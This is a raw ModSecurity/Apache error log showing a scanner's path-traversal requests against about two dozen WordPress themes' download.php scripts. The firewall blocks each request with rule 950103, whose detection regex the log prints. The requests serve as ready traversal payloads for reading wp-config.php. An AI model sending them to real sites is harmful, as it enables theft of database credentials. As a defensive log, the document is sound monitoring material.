"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/erinvale/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/erinvale/download.php"] [unique_id "ZEeenl4G6tVEc6w5Us7gmwAAAM0"] [Tue Apr 25 04:34:23.034731 2023] [:error] [pid 15889:tid 140446990800640] [client 37.120.213.169:41694] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/hsv/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/hsv/download.php"] [unique_id "ZEeen14G6tVEc6w5Us7gnQAAANQ"] [Tue Apr 25 04:34:23.182694 2023] [:error] [pid 15578:tid 140447099905792] [client 37.120.213.169:41696] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/SMWF/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/SMWF/inc/download.php"] [unique_id "ZEeenz754oNYNW-15_AYfwAAAAc"] [Tue Apr 25 04:34:23.337342 2023] [:error] [pid 15579:tid 140447194773248] [client 37.120.213.169:41698] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/markant/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/markant/download.php"] [unique_id "ZEeenyIlOCjnXl5KlpegeAAAAEQ"] [Tue Apr 25 04:34:23.483478 2023] [:error] [pid 15579:tid 140447203165952] [client 37.120.213.169:41700] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/yakimabait/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/yakimabait/download.php"] [unique_id "ZEeenyIlOCjnXl5KlpegeQAAAEM"] [Tue Apr 25 04:34:23.634343 2023] [:error] [pid 15889:tid 140447203165952] [client 37.120.213.169:41706] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/TheLoft/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/TheLoft/download.php"] [unique_id "ZEeen14G6tVEc6w5Us7gnwAAAMM"] [Tue Apr 25 04:34:23.788281 2023] [:error] [pid 15578:tid 140447219951360] [client 37.120.213.169:41708] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/felis/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/felis/download.php"] [unique_id "ZEeenz754oNYNW-15_AYgAAAAAE"] [Tue Apr 25 04:34:23.933232 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:41710] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/MichaelCanthony/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/MichaelCanthony/download.php"] [unique_id "ZEeen9-GjcOLRjW9Sa4WLwAAAII"] [Tue Apr 25 04:34:24.075821 2023] [:error] [pid 15579:tid 140447186380544] [client 37.120.213.169:41712] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/trinity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/trinity/lib/scripts/download.php"] [unique_id "ZEeeoCIlOCjnXl5KlpegegAAAEU"] [Tue Apr 25 04:34:24.215921 2023] [:error] [pid 15580:tid 140447083120384] [client 37.120.213.169:41714] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/epic/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/epic/includes/download.php"] [unique_id "ZEeeoN-GjcOLRjW9Sa4WMAAAAIk"] [Tue Apr 25 04:34:24.359967 2023] [:error] [pid 15889:tid 140447219951360] [client 37.120.213.169:41716] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/urbancity/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/urbancity/lib/scripts/download.php"] [unique_id "ZEeeoF4G6tVEc6w5Us7goAAAAME"] [Tue Apr 25 04:34:24.499624 2023] [:error] [pid 15889:tid 140447032764160] [client 37.120.213.169:41718] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/antioch/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/antioch/lib/scripts/download.php"] [unique_id "ZEeeoF4G6tVEc6w5Us7goQAAAM8"] [Tue Apr 25 04:34:24.632405 2023] [:error] [pid 15889:tid 140447228344064] [client 37.120.213.169:41720] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/churchope/lib/downloadlink.php"] [unique_id "ZEeeoF4G6tVEc6w5Us7gogAAAMA"] [Tue Apr 25 04:34:24.762553 2023] [:error] [pid 15580:tid 140447108298496] [client 37.120.213.169:41722] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/lote27/download.php?download=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/lote27/download.php"] [unique_id "ZEeeoN-GjcOLRjW9Sa4WMQAAAIY"] [Tue Apr 25 04:34:24.896772 2023] [:error] [pid 15889:tid 140447211558656] [client 37.120.213.169:41724] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/linenity/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/linenity/functions/download.php"] [unique_id "ZEeeoF4G6tVEc6w5Us7gowAAAMI"] [Tue Apr 25 04:34:25.025827 2023] [:error] [pid 15580:tid 140447032764160] [client 37.120.213.169:41726] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/medicate/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/medicate/download.php"] [unique_id "ZEeeod-GjcOLRjW9Sa4WMgAAAI8"] [Tue Apr 25 04:34:25.163509 2023] [:error] [pid 15889:tid 140447194773248] [client 37.120.213.169:41730] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/cuckootap/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/cuckootap/download.php"] [unique_id "ZEeeoV4G6tVEc6w5Us7gpAAAAMQ"] [Tue Apr 25 04:34:25.302488 2023] [:error] [pid 15579:tid 140446965622528] [client 37.120.213.169:41732] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/IncredibleWP/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/IncredibleWP/download.php"] [unique_id "ZEeeoSIlOCjnXl5KlpegewAAAFc"] [Tue Apr 25 04:34:25.433403 2023] [:error] [pid 15580:tid 140447074727680] [client 37.120.213.169:41734] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/ultimatum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/ultimatum/download.php"] [unique_id "ZEeeod-GjcOLRjW9Sa4WNAAAAIo"] [Tue Apr 25 04:34:25.559699 2023] [:error] [pid 15579:tid 140447219951360] [client 37.120.213.169:41736] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Centum/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Centum/download.php"] [unique_id "ZEeeoSIlOCjnXl5KlpegfAAAAEE"] [Tue Apr 25 04:34:25.685496 2023] [:error] [pid 15580:tid 140446974015232] [client 37.120.213.169:41738] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/Avada/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/Avada/download.php"] [unique_id "ZEeeod-GjcOLRjW9Sa4WNQAAAJY"] [Tue Apr 25 04:34:25.813110 2023] [:error] [pid 15889:tid 140446982407936] [client 37.120.213.169:41740] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/striking_r/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/striking_r/download.php"] [unique_id "ZEeeoV4G6tVEc6w5Us7gpQAAANU"] [Tue Apr 25 04:34:25.939354 2023] [:error] [pid 15580:tid 140446999193344] [client 37.120.213.169:41742] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/beach_apollo/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag 